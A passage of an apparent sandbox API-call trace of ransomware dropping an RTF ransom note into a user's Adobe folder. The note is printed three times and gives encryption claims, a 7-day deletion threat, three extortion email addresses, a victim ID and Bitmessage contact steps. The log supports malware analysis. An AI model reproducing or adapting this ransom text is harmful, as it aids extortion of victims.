"c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\#readme_eman#.rtf")) returned 0xffffffff [0269.785] GetLastError () returned 0x2 [0269.785] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.786] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.786] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.786] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm 